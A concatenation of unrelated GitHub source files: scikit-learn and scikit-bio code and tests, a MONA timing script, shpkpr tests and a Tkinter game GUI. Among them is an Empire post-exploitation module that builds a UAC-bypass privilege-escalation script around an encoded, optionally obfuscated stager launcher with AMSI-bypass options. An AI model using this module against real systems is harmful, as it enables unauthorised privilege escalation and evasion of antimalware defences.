# 10 images per class, 400 images total, each class is contiguous.
target = np.array([i // 10 for i in range(400)])
if shuffle:
random_state = check_random_state(random_state)
order = random_state.permutation(len(faces))
faces = faces[order]
target = target[order]
return Bunch(data=faces.reshape(len(faces), -1),
images=faces,
target=target,
DESCR=MODULE_DOCS)
|
{
"content_hash": "ddf3b44003e1a4474ae7a1b1884f47a7",
"timestamp": "",
"source": "github",
"line_count": 110,
"max_line_length": 78,
"avg_line_length": 35.29090909090909,
"alnum_prop": 0.6813498196805771,
"repo_name": "joshbohde/scikit-learn",
"id": "6ce33ebfd19d5c40b4d65f4d4826f6b75f46547d",
"size": "3882",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "sklearn/datasets/olivetti_faces.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
}
|
import unittest
import numpy.testing as npt
import numpy as np
from skbio import Sequence, DNA, RNA
from skbio.io.format._base import (_decode_qual_to_phred,
_encode_phred_to_qual, _get_nth_sequence,
_parse_fasta_like_header,
_format_fasta_like_records)
class PhredDecoderTests(unittest.TestCase):
    """Unit tests for ``_decode_qual_to_phred``.

    The asserted message fragments are part of the contract under test,
    so they must match the implementation exactly.
    """

    def test_missing_variant_and_phred_offset(self):
        # One of `variant` / `phred_offset` must be supplied to decode.
        with self.assertRaises(ValueError) as cm:
            _decode_qual_to_phred('abcd')
        self.assertIn('`variant`', str(cm.exception))
        self.assertIn('`phred_offset`', str(cm.exception))
        self.assertIn('decode', str(cm.exception))

    def test_variant_and_phred_offset_provided(self):
        # Supplying both is rejected as ambiguous.
        with self.assertRaises(ValueError) as cm:
            _decode_qual_to_phred('abcd', variant='sanger', phred_offset=64)
        self.assertIn('both', str(cm.exception))
        self.assertIn('`variant`', str(cm.exception))
        self.assertIn('`phred_offset`', str(cm.exception))

    def test_solexa_variant(self):
        # The solexa variant is rejected; the message contains '719'
        # (presumably a tracker issue number -- TODO confirm).
        with self.assertRaises(ValueError) as cm:
            _decode_qual_to_phred('abcd', variant='solexa')
        self.assertIn('719', str(cm.exception))

    def test_unrecognized_variant(self):
        # An unknown variant name is echoed back in the error message.
        with self.assertRaises(ValueError) as cm:
            _decode_qual_to_phred('abcd', variant='illumina')
        self.assertIn('variant', str(cm.exception))
        self.assertIn("'illumina'", str(cm.exception))

    def test_empty_qual_str(self):
        # An empty quality string decodes to an empty uint8 array.
        npt.assert_equal(_decode_qual_to_phred('', variant='sanger'),
                         np.array([], dtype=np.uint8))

    def test_sanger_variant(self):
        # test entire range of possible ascii chars for sanger
        all_sanger_ascii = ('!"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOP'
                            'QRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~')
        obs = _decode_qual_to_phred(all_sanger_ascii, variant='sanger')
        npt.assert_equal(obs, np.arange(94))

        # A space falls outside sanger's decodable range [0, 93].
        with self.assertRaises(ValueError) as cm:
            _decode_qual_to_phred('a b', variant='sanger')
        self.assertIn('[0, 93]', str(cm.exception))

    def test_illumina13_variant(self):
        # test entire range of possible ascii chars for illumina1.3
        all_illumina13_ascii = ('@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijk'
                                'lmnopqrstuvwxyz{|}~')
        obs = _decode_qual_to_phred(all_illumina13_ascii,
                                    variant='illumina1.3')
        npt.assert_equal(obs, np.arange(63))

        # '!' sits below the illumina1.3 range and must be rejected.
        with self.assertRaises(ValueError) as cm:
            _decode_qual_to_phred('a!b', variant='illumina1.3')
        self.assertIn('[0, 62]', str(cm.exception))

    def test_illumina18_variant(self):
        # test entire range of possible ascii chars for illumina1.8
        all_illumina18_ascii = ('!"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKL'
                                'MNOPQRSTUVWXYZ[\\]^_')
        obs = _decode_qual_to_phred(all_illumina18_ascii,
                                    variant='illumina1.8')
        npt.assert_equal(obs, np.arange(63))

        # Lowercase letters fall outside illumina1.8's range.
        with self.assertRaises(ValueError) as cm:
            _decode_qual_to_phred('AaB', variant='illumina1.8')
        self.assertIn('[0, 62]', str(cm.exception))

    def test_custom_phred_offset(self):
        ascii_chars = '*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\'
        obs = _decode_qual_to_phred(ascii_chars, phred_offset=42)
        npt.assert_equal(obs, np.arange(51))

        # '*' (ASCII 42) is below offset 43, so decoding fails.
        with self.assertRaises(ValueError) as cm:
            _decode_qual_to_phred(ascii_chars, phred_offset=43)
        self.assertIn('[0, 83]', str(cm.exception))

        # Offsets must keep qualities within printable ASCII.
        with self.assertRaises(ValueError) as cm:
            _decode_qual_to_phred(ascii_chars, phred_offset=0)
        self.assertIn('`phred_offset`', str(cm.exception))
        self.assertIn('printable', str(cm.exception))

        with self.assertRaises(ValueError) as cm:
            _decode_qual_to_phred(ascii_chars, phred_offset=127)
        self.assertIn('`phred_offset`', str(cm.exception))
        self.assertIn('printable', str(cm.exception))
class PhredEncoderTests(unittest.TestCase):
    """Unit tests for ``_encode_phred_to_qual``.

    Mirrors ``PhredDecoderTests``: the asserted message fragments and
    expected quality strings are exact contracts of the implementation.
    """

    def test_missing_variant_and_phred_offset(self):
        # One of `variant` / `phred_offset` must be supplied to encode.
        with self.assertRaises(ValueError) as cm:
            _encode_phred_to_qual([1, 2, 3])
        self.assertIn('`variant`', str(cm.exception))
        self.assertIn('`phred_offset`', str(cm.exception))
        self.assertIn('encode', str(cm.exception))

    def test_variant_and_phred_offset_provided(self):
        # Supplying both is rejected as ambiguous.
        with self.assertRaises(ValueError) as cm:
            _encode_phred_to_qual([1, 2, 3], variant='sanger', phred_offset=64)
        self.assertIn('both', str(cm.exception))
        self.assertIn('`variant`', str(cm.exception))
        self.assertIn('`phred_offset`', str(cm.exception))

    def test_solexa_variant(self):
        # The solexa variant is rejected; the message contains '719'
        # (presumably a tracker issue number -- TODO confirm).
        with self.assertRaises(ValueError) as cm:
            _encode_phred_to_qual([1, 2, 3], variant='solexa')
        self.assertIn('719', str(cm.exception))

    def test_unrecognized_variant(self):
        # An unknown variant name is echoed back in the error message.
        with self.assertRaises(ValueError) as cm:
            _encode_phred_to_qual([1, 2, 3], variant='illumina')
        self.assertIn('variant', str(cm.exception))
        self.assertIn("'illumina'", str(cm.exception))

    def test_no_phred_scores(self):
        # No scores encode to the empty string.
        self.assertEqual(_encode_phred_to_qual([], variant='sanger'), '')

    def test_sanger_variant(self):
        # test entire range of possible ascii chars for sanger
        all_sanger_ascii = ('!"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOP'
                            'QRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~')
        obs = _encode_phred_to_qual(list(range(94)), variant='sanger')
        self.assertEqual(obs, all_sanger_ascii)

        # Negative scores are a hard error; the offending value is reported.
        with self.assertRaises(ValueError) as cm:
            _encode_phred_to_qual([42, -1, 33], variant='sanger')
        self.assertIn('-1', str(cm.exception))
        self.assertIn('[0, 93]', str(cm.exception))

        # Scores above the range encode as the max char ('~') with a warning.
        obs = npt.assert_warns(UserWarning, _encode_phred_to_qual,
                               [42, 94, 33], variant='sanger')
        self.assertEqual(obs, 'K~B')

    def test_illumina13_variant(self):
        # test entire range of possible ascii chars for illumina1.3
        all_illumina13_ascii = ('@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijk'
                                'lmnopqrstuvwxyz{|}~')
        obs = _encode_phred_to_qual(list(range(63)), variant='illumina1.3')
        self.assertEqual(obs, all_illumina13_ascii)

        with self.assertRaises(ValueError) as cm:
            _encode_phred_to_qual([42, -1, 33], variant='illumina1.3')
        self.assertIn('-1', str(cm.exception))
        self.assertIn('[0, 62]', str(cm.exception))

        # Out-of-range high score encodes as max char with a warning.
        obs = npt.assert_warns(UserWarning, _encode_phred_to_qual,
                               [42, 63, 33], variant='illumina1.3')
        self.assertEqual(obs, 'j~a')

    def test_illumina18_variant(self):
        # test entire range of possible ascii chars for illumina1.8
        all_illumina18_ascii = ('!"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKL'
                                'MNOPQRSTUVWXYZ[\\]^_')
        obs = _encode_phred_to_qual(list(range(63)), variant='illumina1.8')
        self.assertEqual(obs, all_illumina18_ascii)

        with self.assertRaises(ValueError) as cm:
            _encode_phred_to_qual([42, -1, 33], variant='illumina1.8')
        self.assertIn('-1', str(cm.exception))
        self.assertIn('[0, 62]', str(cm.exception))

        # Out-of-range high score encodes as max char ('_') with a warning.
        obs = npt.assert_warns(UserWarning, _encode_phred_to_qual,
                               [42, 63, 33], variant='illumina1.8')
        self.assertEqual(obs, 'K_B')

    def test_custom_phred_offset(self):
        ascii_chars = '*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\'
        obs = _encode_phred_to_qual(list(range(51)), phred_offset=42)
        self.assertEqual(obs, ascii_chars)

        with self.assertRaises(ValueError) as cm:
            _encode_phred_to_qual([42, -1, 33], phred_offset=42)
        self.assertIn('-1', str(cm.exception))
        self.assertIn('[0, 84]', str(cm.exception))

        # Out-of-range high score encodes as max char with a warning.
        obs = npt.assert_warns(UserWarning, _encode_phred_to_qual,
                               [42, 255, 33], phred_offset=42)
        self.assertEqual(obs, 'T~K')
class TestGetNthSequence(unittest.TestCase):
    """Unit tests for ``_get_nth_sequence``."""

    def setUp(self):
        # Lazily yields 'goldilocks: 1' through 'goldilocks: 5'.
        self.gen = ('goldilocks: ' + str(idx) for idx in range(1, 6))

    def test_seq_num_too_small(self):
        """Sequence numbers below 1 are rejected."""
        with self.assertRaises(ValueError) as ctx:
            _get_nth_sequence(self.gen, 0)
        message = str(ctx.exception)
        self.assertIn('between 1 and', message)
        self.assertIn('0', message)

    def test_seq_num_too_big(self):
        """Requesting a sequence past the end of the stream is an error."""
        with self.assertRaises(ValueError) as ctx:
            _get_nth_sequence(self.gen, 6)
        message = str(ctx.exception)
        self.assertIn('end of file', message)
        self.assertIn('6th', message)

    def test_seq_num_just_right(self):
        """A valid sequence number returns the matching element."""
        self.assertEqual(_get_nth_sequence(self.gen, 3), 'goldilocks: 3')
class TestParseFASTALikeHeader(unittest.TestCase):
    """Unit tests for ``_parse_fasta_like_header``."""

    def _check(self, header, expected_id, expected_description):
        # Parse `header` and compare against the expected (id, description).
        self.assertEqual(_parse_fasta_like_header(header),
                         (expected_id, expected_description))

    def test_no_id_or_description(self):
        """Whitespace-only header yields empty id and description."""
        self._check('> \t\t \n', '', '')

    def test_id_only(self):
        """Token attached to '>' is the id."""
        self._check('>suht! \t\t \n', 'suht!', '')

    def test_description_only(self):
        """Token separated from '>' by a space is the description."""
        self._check('> suht! \t\t \n', '', 'suht!')

    def test_id_and_description(self):
        """Both id and description present."""
        self._check('>!thus suht! \t\t \n', '!thus', 'suht!')
class TestFormatFASTALikeRecords(unittest.TestCase):
    """Unit tests for ``_format_fasta_like_records``."""

    def setUp(self):
        # Four records covering: quality scores present, whitespace-laden id,
        # newlines inside the description, and id + description + quality.
        def generator():
            yield Sequence('ACGT', metadata={'id': '', 'description': ''},
                           positional_metadata={'quality': range(4)})
            yield RNA('GAU', metadata={'id': ' foo \t\t bar ',
                                       'description': ''})
            yield DNA('TAG',
                      metadata={'id': '', 'description': 'foo\n\n bar\n'})
            yield Sequence('A',
                           metadata={'id': 'foo', 'description': 'bar baz'},
                           positional_metadata={'quality': [42]})
        self.gen = generator()

    def test_no_replacement(self):
        # With replacement disabled, ids/descriptions pass through verbatim.
        exp = [
            ('', 'ACGT', range(4)),
            (' foo \t\t bar ', 'GAU', None),
            (' foo\n\n bar\n', 'TAG', None),
            ('foo bar baz', 'A', [42])
        ]
        obs = list(_format_fasta_like_records(self.gen, None, None, False))

        self.assertEqual(len(obs), len(exp))
        for o, e in zip(obs, exp):
            npt.assert_equal(o, e)

    def test_empty_str_replacement(self):
        # Whitespace/newline runs collapse to nothing when replaced with ''.
        exp = [
            ('', 'ACGT', range(4)),
            ('foobar', 'GAU', None),
            (' foo bar', 'TAG', None),
            ('foo bar baz', 'A', [42])
        ]
        obs = list(_format_fasta_like_records(self.gen, '', '', False))

        self.assertEqual(len(obs), len(exp))
        for o, e in zip(obs, exp):
            npt.assert_equal(o, e)

    def test_multi_char_replacement(self):
        # Each whitespace/newline run is replaced by the full multi-char string.
        exp = [
            ('', 'ACGT', range(4)),
            ('-.--.-foo-.--.--.--.-bar-.-', 'GAU', None),
            (' foo_-__-_ bar_-_', 'TAG', None),
            ('foo bar baz', 'A', [42])
        ]
        obs = list(_format_fasta_like_records(self.gen, '-.-', '_-_', False))

        self.assertEqual(len(obs), len(exp))
        for o, e in zip(obs, exp):
            npt.assert_equal(o, e)

    def test_newline_character_in_id_whitespace_replacement(self):
        # Replacement strings themselves may not contain newlines.
        with self.assertRaisesRegex(ValueError, r'Newline character'):
            list(_format_fasta_like_records(self.gen, '-\n--', ' ', False))

    def test_newline_character_in_description_newline_replacement(self):
        with self.assertRaisesRegex(ValueError, r'Newline character'):
            list(_format_fasta_like_records(self.gen, None, 'a\nb', False))

    def test_empty_sequence(self):
        # Empty sequences are rejected, identified by ordinal position.
        def blank_seq_gen():
            yield from (DNA('A'), Sequence(''), RNA('GG'))

        with self.assertRaisesRegex(ValueError, r'2nd.*empty'):
            list(_format_fasta_like_records(blank_seq_gen(), None, None,
                                            False))

    def test_missing_quality_scores(self):
        # When qualities are required, a record lacking them is rejected.
        def missing_qual_gen():
            yield from (RNA('A', positional_metadata={'quality': [42]}),
                        Sequence('AG'),
                        DNA('GG', positional_metadata={'quality': [41, 40]}))

        with self.assertRaisesRegex(ValueError,
                                    r'2nd sequence.*quality scores'):
            list(_format_fasta_like_records(missing_qual_gen(), '-', '-',
                                            True))
# Allow running this test module directly (e.g. ``python test_base.py``).
if __name__ == '__main__':
    unittest.main()
|
{
"content_hash": "dfa3d229ea5b252e8c316eb23c93aa73",
"timestamp": "",
"source": "github",
"line_count": 317,
"max_line_length": 79,
"avg_line_length": 41.27444794952682,
"alnum_prop": 0.5652705594619383,
"repo_name": "gregcaporaso/scikit-bio",
"id": "059a45785024d83a11d90542649a6049892b023a",
"size": "13438",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "skbio/io/format/tests/test_base.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "822164"
},
{
"name": "CSS",
"bytes": "4379"
},
{
"name": "Cython",
"bytes": "66355"
},
{
"name": "Dockerfile",
"bytes": "904"
},
{
"name": "Jupyter Notebook",
"bytes": "210926"
},
{
"name": "Makefile",
"bytes": "1075"
},
{
"name": "Python",
"bytes": "2960199"
},
{
"name": "Roff",
"bytes": "471"
}
],
"symlink_target": ""
}
|
import os
from easyprocess import EasyProcess
# Prefix that precedes the total-time figure in MONA's output.
# NOTE(review): this assignment shadows the builtin ``str`` module-wide;
# renaming would require touching every use in callProcess().
str = 'Total time: '
def main():
    """Run ``mona`` on every .mona file under ./lift, printing one timing row per file."""
    dir = os.getcwd() # this returns current directory of monaTest.py
    dir = os.path.join(dir, 'lift') # this joins the current directory and the directory to MonaFiles
    #print header of the output in format
    #print '%-25s %-25s'%('File Name', 'Total Time')
    for root, dirs, files in os.walk(dir):
        for fname in files:
            #print fname
            # NOTE(review): the path is rebuilt as 'lift/<fname>' regardless of
            # `root`, so files found in nested subdirectories by os.walk would
            # get a wrong path -- confirm the directory is flat.
            fullName = 'lift/'+fname
            if fname.endswith('.mona'):
                callProcess('mona '+ fullName, fname)
#this function is slightly different from monaTest.py, this only prints file name and its total time in milliseconds
def callProcess(command, filename):
    """Run `command` with a 60s timeout; print filename, total time (ms) and satisfiability."""
    #set timeout in seconds below in .call(timeout=XX)
    proc = EasyProcess(command).call(timeout=60)
    totalTime = 60000 #default totaltime is timeout on 60000ms
    #it will be refreshed if the experiment does not exceed time limit
    output = proc.stdout
    if output is None:
        # No stdout captured at all: report an error row for this file.
        print '%-25s %-25s'%(filename, 'error')
    else:
        # below will check the information of each file
        if 'unsatisfiable' in output:
            satisfiability = 'false'
        else:
            satisfiability = 'true'
        if '100%' in output:
            # if the AUTOMATON CONSTRUCTION is 100%,
            # that means this MONA file has complete result
            for line in output.split(os.linesep):
                if str in line:
                    # extract total time
                    # NOTE(review): module-level `str` is the 'Total time: '
                    # prefix (it shadows the builtin).
                    time= line[line.index(str)+len(str):].encode('raw_unicode_escape').decode('utf8')
                    # NOTE(review): slices presume a 'xx:mm:ss.cc'-style stamp:
                    # minutes*60000 + seconds*1000 + hundredths*10; the leading
                    # field (time[0:2]) is ignored -- confirm this is intended.
                    totalTime= int(time[6:8])*1000+int(time[9:11])*10+int(time[3:5])*60000
        else:
            # if the AUTOMATON CONSTRUCTION is not 100%,
            # that means it exceeds the timeout limit
            totalTime = 60000
            satisfiability = ''
        #print each file's info in format
        print '%-25s %-25s %-25s'%(filename, totalTime, satisfiability)
# Script entry point (also runs on import -- no __main__ guard).
main()
|
{
"content_hash": "5c2ff285b16e6c2154c68d2490cef230",
"timestamp": "",
"source": "github",
"line_count": 51,
"max_line_length": 117,
"avg_line_length": 39.92156862745098,
"alnum_prop": 0.6075638506876228,
"repo_name": "lorisdanto/automatark",
"id": "d4a4ef98eae1c66925d0c1437971c3f05d3afffd",
"size": "2783",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "m2l-str/LTL-finite/monaScriptM2L.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "149632"
},
{
"name": "Java",
"bytes": "306917"
},
{
"name": "OCaml",
"bytes": "294926"
},
{
"name": "Python",
"bytes": "10553"
}
],
"symlink_target": ""
}
|
from __future__ import print_function
from builtins import str
from builtins import object
from lib.common import helpers
class Module(object):
    """Empire PowerShell module wrapping the Invoke-BypassUAC privilege-escalation attack."""

    def __init__(self, mainMenu, params=None):
        """
        :param mainMenu: the Empire main menu object, kept for access to
            listeners/stagers/agent handlers.
        :param params: optional iterable of [Name, Value] pairs used to
            pre-populate ``self.options``.
        """
        # Module metadata consumed by Empire's menu/reporting machinery.
        self.info = {
            'Name': 'Invoke-BypassUAC',

            'Author': ['Leo Davidson', '@meatballs__', '@TheColonial', '@mattifestation', '@harmyj0y', '@sixdub'],

            'Description': ("Runs a BypassUAC attack to escape from a medium integrity process "
                            "to a high integrity process. This attack was originally discovered by Leo Davidson. "
                            "Empire uses components of MSF's bypassuac injection implementation as well as "
                            "an adapted version of PowerSploit's Invoke--Shellcode.ps1 script for backend lifting."),

            'Software': '',

            'Techniques': ['T1088'],

            'Background': True,

            'OutputExtension': None,

            'NeedsAdmin': False,

            'OpsecSafe': False,

            'Language': 'powershell',

            'MinLanguageVersion': '2',

            'Comments': [
                'https://github.com/mattifestation/PowerSploit/blob/master/CodeExecution/Invoke--Shellcode.ps1',
                'https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/bypassuac_injection.rb',
                'https://github.com/rapid7/metasploit-framework/tree/master/external/source/exploits/bypassuac_injection/dll/src',
                'http://www.pretentiousname.com/'
            ]
        }

        # Options settable at runtime; format: value_name -> {Description, Required, Value}.
        self.options = {
            'Agent': {
                'Description': 'Agent to run module on.',
                'Required': True,
                'Value': ''
            },
            'Listener': {
                'Description': 'Listener to use.',
                'Required': True,
                'Value': ''
            },
            'Obfuscate': {
                'Description': 'Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.',
                'Required': False,
                'Value': 'False'
            },
            'ObfuscateCommand': {
                'Description': 'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.',
                'Required': False,
                'Value': r'Token\All\1'
            },
            'AMSIBypass': {
                'Description': 'Include mattifestation\'s AMSI Bypass in the stager code.',
                'Required': False,
                'Value': 'True'
            },
            'AMSIBypass2': {
                'Description': 'Include Tal Liberman\'s AMSI Bypass in the stager code.',
                'Required': False,
                'Value': 'False'
            },
            'UserAgent': {
                'Description': 'User-agent string to use for the staging request (default, none, or other).',
                'Required': False,
                'Value': 'default'
            },
            'Proxy': {
                'Description': 'Proxy to use for request (default, none, or other).',
                'Required': False,
                'Value': 'default'
            },
            'ProxyCreds': {
                'Description': 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
                'Required': False,
                'Value': 'default'
            }
        }

        # save off a copy of the mainMenu object to access external functionality
        # like listeners/agent handlers/etc.
        self.mainMenu = mainMenu

        # FIX: the original used a mutable default argument (params=[]);
        # default to None and substitute a fresh empty list per call.
        for param in params or []:
            # parameter format is [Name, Value]
            option, value = param
            if option in self.options:
                self.options[option]['Value'] = value

    def generate(self, obfuscate=False, obfuscationCommand=""):
        """Build and return the full PowerShell script for this module.

        Returns an empty string when the listener is invalid, launcher
        generation fails, or the module source cannot be read.
        """
        # Booleans parsed from the string-valued options below.
        Obfuscate = False
        AMSIBypass = False
        AMSIBypass2 = False

        listenerName = self.options['Listener']['Value']

        # staging options
        userAgent = self.options['UserAgent']['Value']
        proxy = self.options['Proxy']['Value']
        proxyCreds = self.options['ProxyCreds']['Value']

        if (self.options['Obfuscate']['Value']).lower() == 'true':
            Obfuscate = True
        ObfuscateCommand = self.options['ObfuscateCommand']['Value']

        if (self.options['AMSIBypass']['Value']).lower() == 'true':
            AMSIBypass = True

        if (self.options['AMSIBypass2']['Value']).lower() == 'true':
            AMSIBypass2 = True

        # read in the common module source code
        moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/Invoke-BypassUAC.ps1"
        if obfuscate:
            helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
            moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")

        # FIX: use a context manager and catch only I/O errors; the original
        # used a bare `except:` (hiding unrelated failures) and leaked the
        # file handle if read() raised.
        try:
            with open(moduleSource, 'r') as f:
                moduleCode = f.read()
        except (IOError, OSError):
            print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
            return ""

        script = moduleCode

        if not self.mainMenu.listeners.is_listener_valid(listenerName):
            # not a valid listener, return nothing for the script
            print(helpers.color("[!] Invalid listener: " + listenerName))
            return ""
        else:
            # generate the PowerShell one-liner with all of the proper options set
            launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=True, obfuscate=Obfuscate,
                                                               obfuscationCommand=ObfuscateCommand, userAgent=userAgent, proxy=proxy,
                                                               proxyCreds=proxyCreds, AMSIBypass=AMSIBypass, AMSIBypass2=AMSIBypass2)
            if launcher == "":
                print(helpers.color("[!] Error in launcher generation."))
                return ""
            else:
                scriptEnd = "Invoke-BypassUAC -Command \"%s\"" % (launcher)
                if obfuscate:
                    scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
                script += scriptEnd
                script = helpers.keyword_obfuscation(script)
                return script
|
{
"content_hash": "09a7b99e989b0be5acbaa9986575cd6c",
"timestamp": "",
"source": "github",
"line_count": 164,
"max_line_length": 151,
"avg_line_length": 41.8109756097561,
"alnum_prop": 0.5365320110835642,
"repo_name": "byt3bl33d3r/Empire",
"id": "373eaa6b5954b37b3bf6138d45d92c276440dad3",
"size": "6857",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lib/modules/powershell/privesc/bypassuac.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "1966"
},
{
"name": "Java",
"bytes": "496"
},
{
"name": "Objective-C",
"bytes": "2664"
},
{
"name": "PHP",
"bytes": "2198"
},
{
"name": "PowerShell",
"bytes": "16998705"
},
{
"name": "Python",
"bytes": "2789955"
},
{
"name": "Shell",
"bytes": "10123"
}
],
"symlink_target": ""
}
|
import pytest
# local imports
from shpkpr import exceptions
@exceptions.rewrap(ValueError)
def _this_doesnt_raise():
    """Decorated helper that raises nothing; checks pass-through of return values.
    """
    result = 'something'
    return result
@exceptions.rewrap(ValueError)
def _this_raises_a_key_error():
    """Decorated helper that raises a KeyError the decorator does not list.
    """
    empty = {}
    return empty['non-existant-key']
@exceptions.rewrap(ValueError)
def _this_raises_a_value_error():
    """Decorated helper that raises a ValueError for the decorator to rewrap.
    """
    bad_number = "banana for scale"
    return int(bad_number)
@exceptions.rewrap(ValueError, KeyError)
def _this_also_raises_a_value_error():
    """Decorated helper raising ValueError, with an extra decorator argument.
    """
    not_a_number = "I suggest you drop it, Mr. Data"
    return int(not_a_number)
class ExceptionRaiser(object):
    """Dummy class whose methods raise through the exceptions.rewrap decorator.
    """
    @exceptions.rewrap(KeyError)
    def this_raises_a_key_error(self):
        missing = {}
        return missing['non-existant-key']
    @exceptions.rewrap(ValueError)
    def this_also_raises_a_key_error(self):
        lookup = {}
        return lookup['non-existant-key']
def test_rewrap_func_doesnt_rewrap_uncaught_exception():
    """KeyError is not listed in the decorator, so it propagates unchanged."""
    pytest.raises(KeyError, _this_raises_a_key_error)
def test_rewrap_func_raises_correct_exception():
    """A listed ValueError is rewrapped into ShpkprException."""
    pytest.raises(exceptions.ShpkprException, _this_raises_a_value_error)
def test_rewrap_func_raises_correct_exception_keyerror():
    """With a second decorator argument the ValueError surfaces as KeyError."""
    pytest.raises(KeyError, _this_also_raises_a_value_error)
def test_rewrap_method_raises_correct_exception():
    """rewrap works on instance methods: listed KeyError becomes ShpkprException."""
    raiser = ExceptionRaiser()
    pytest.raises(exceptions.ShpkprException, raiser.this_raises_a_key_error)
def test_rewrap_method_doesnt_rewrap_uncaught_exception():
    """An unlisted KeyError raised from a method propagates unchanged."""
    raiser = ExceptionRaiser()
    pytest.raises(KeyError, raiser.this_also_raises_a_key_error)
def test_decorated_func_returns_as_normal_when_nothing_is_raised():
    """When nothing raises, the decorator passes the return value through."""
    result = _this_doesnt_raise()
    assert result == 'something'
|
{
"content_hash": "930bca451e8fa002267f3ceb7cdafedf",
"timestamp": "",
"source": "github",
"line_count": 76,
"max_line_length": 67,
"avg_line_length": 25.61842105263158,
"alnum_prop": 0.6985105290190036,
"repo_name": "shopkeep/shpkpr",
"id": "2723b817502957ac0b7ec2a4576a4cd7ed0beb80",
"size": "1969",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_exceptions.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "172"
},
{
"name": "Makefile",
"bytes": "2358"
},
{
"name": "Python",
"bytes": "139438"
},
{
"name": "Shell",
"bytes": "1111"
}
],
"symlink_target": ""
}
|
import database as d

import matplotlib
# Fixed: matplotlib.use() must run BEFORE pyplot is imported, otherwise the
# TkAgg backend selection is ignored (or warned about) on many matplotlib
# versions.
matplotlib.use('TkAgg')
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
from matplotlib.figure import Figure
import tkinter as tk
import copy

#WARNING: throws error if run from here. Import to economy directory and run from there. Necessary because image files are stored there.

# Shared fonts for all frames in this module.
TITLE_FONT = ("Black chancery", "18", "bold")
TEXT_FONT = ("Black chancery", "15")
BUTTON_FONT = ("Black chancery", "13")
class gui(tk.Tk):
    """Top-level Tk window for the Jonestown economy game.

    Lays out the left side (title bar, main display area, text log) and the
    right side (character data, keyboard menus, quit bar), and exposes the
    character controller plus the display/text controllers to child frames.
    """

    def __init__(self, char, *args, **kwargs):
        tk.Tk.__init__(self, *args, **kwargs)
        #char is character controller from ai
        self.char = char
        self.display_cont = None
        self.text_cont = None
        # Hotkeys currently bound on the root; each keyboard frame swaps
        # these when it is raised.
        self.hotkeys = []
        self.dynamic_hotkeys = []
        self.wm_title("Jonestown")
        # root.resizable(0,0)
        #megaFrames
        leftSide = tk.Frame(self)
        rightSide = tk.Frame(self)
        #frames
        titleImage = tk.PhotoImage(file="./images/jonestown.gif")
        titleBar = tk.Label(leftSide, image=titleImage, width=1114, height=150)
        # Keep a reference so the PhotoImage is not garbage collected.
        titleBar.image = titleImage
        display = display_controller(leftSide, self)
        printout = text_output(leftSide, self, height=300, width=1114)
        charDisplay = static_data(rightSide, self, height=474, width=300, background="yellow")
        keyboard = key_controller(rightSide, self, height=474, width=300, background="orange")
        self.keyboard = keyboard
        quitter = quitBar(rightSide, self, width=300, background="red")
        #set controllers
        self.display_cont = display
        self.text_cont = printout
        #printout
        printout.grid_propagate(False)
        #charData
        charDisplay.pack_propagate(False)
        #root grid
        leftSide.grid(row=0, column=0, sticky=tk.NSEW)
        rightSide.grid(row=0, column=1, sticky=tk.NSEW)
        #leftSide grid
        titleBar.grid(row=0, column=0)
        display.grid(row=1, column=0)
        printout.grid(row=2, column=0, sticky='nsew')
        #rightSide grid
        charDisplay.grid(row=0, column=0, sticky='nsew')
        keyboard.grid(row=1, column=0, sticky="nsew")
        rightSide.grid_rowconfigure(1, weight=1)
        rightSide.grid_rowconfigure(0, weight=1)
        quitter.grid(row=3, column=0, sticky="nsew")

    def getChar(self):
        """Return the character controller."""
        return self.char

    def addChar(self, char):
        """Replace the character controller."""
        self.char = char

    def get_display_cont(self):
        """Return the display_controller managing the main display area."""
        return self.display_cont

    def get_text_cont(self):
        """Return the text_output frame used as the message log."""
        return self.text_cont

    def out(self, text):
        """Append text to the message log."""
        self.text_cont.out(text)
#display
class display_controller(tk.Frame):
    """Container that stacks the main display pages and switches between them.

    Pages: matplotlib_display (charts), list_display (text columns), and two
    tutorial pages registered as "main_display" and "other_display".
    """

    def __init__(self, parent, root, *args, **kwargs):
        from tutorials import tutorials
        tk.Frame.__init__(self, master=parent, *args, **kwargs)
        self.root = root
        self.grid_rowconfigure(0, weight=1)
        self.grid_columnconfigure(0, weight=1)
        self.grid()
        self.frames = {}
        for display in (matplotlib_display, list_display):
            page_name = display.__name__
            frame = display(parent=self, controller=self, root=root)
